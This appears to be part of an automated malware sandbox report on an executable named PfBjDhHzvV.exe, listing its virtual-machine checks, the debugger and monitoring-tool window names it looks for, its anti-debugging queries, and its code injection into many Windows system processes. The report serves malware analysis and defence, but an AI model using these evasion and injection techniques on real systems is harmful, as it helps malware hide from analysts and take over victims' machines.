            Source: explorer.exe, 0000000A.00000003.2279706971.000000000730A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
            Source: svchost.exe, 00000007.00000000.1425679854.0000018CE728E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1544900444.000001EC94D72000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: SearchApp.exe, 0000000F.00000000.1623611969.000001F4AEDB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: yexcelneroonenotelyncvmware:wux:itunesvisio&#xEF87binPT.vssxx86amd64objdFEHobjLRA.psd.dwg.ai
            Source: explorer.exe, 0000000A.00000002.3016089199.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275899145.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1450832815.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
            Source: explorer.exe, 0000000A.00000000.1444343240.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
            Source: SearchApp.exe, 0000000F.00000000.1578437841.000001F49D9E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w0@
            Source: SearchApp.exe, 0000000F.00000000.1544964068.000001EC94DA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
            Source: explorer.exe, 0000000A.00000002.2634147825.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Thread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Open window title or class name: regmonclass
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Open window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Open window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Open window title or class name: ollydbg
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Open window title or class name: filemonclass
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Process queried: DebugObjectHandle
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_0129392D Sleep,lstrcpy,LoadLibraryA,GetProcAddress,FreeLibrary,lstrcat,LoadLibraryA,GetProcAddress,CreateThread,CreateThread,Sleep,Sleep,CreateThread,Sleep,Sleep,0_2_0129392D
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_01291EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,0_2_01291EF6
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Process token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: 9D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: AD0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\sihost.exe base: 3B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 980000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: AB0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\explorer.exe base: 1080000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: BD0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CA0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 8C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: ED0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 950000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: 70000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 120000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: C40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 290000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 580000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: DB0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: A80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2410000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2460000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2290000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 950000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 960000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: BF0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: C00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 340000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 350000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1490000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2E70000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2470000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 25C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F60000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F70000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 21D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2320000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2930000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2980000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 840000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 890000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2460000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 24B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2260000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F20000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F70000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2390000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 23E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 25B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 25C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2A90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DE0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2D00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2D60000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 9C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 9D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1270000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1280000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DC0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2E10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2EB0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2F00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2330000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2380000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2450000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 24A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2F50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2F60000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 860000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2420000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 25D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2620000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1170000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1180000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2700000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2710000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2940000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2A90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 710000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 760000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2210000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2260000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: C40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: C50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 26E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 26F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 240000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 250000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 790000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 7A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22D0000 protect: page execute and read and writeJump to behavior
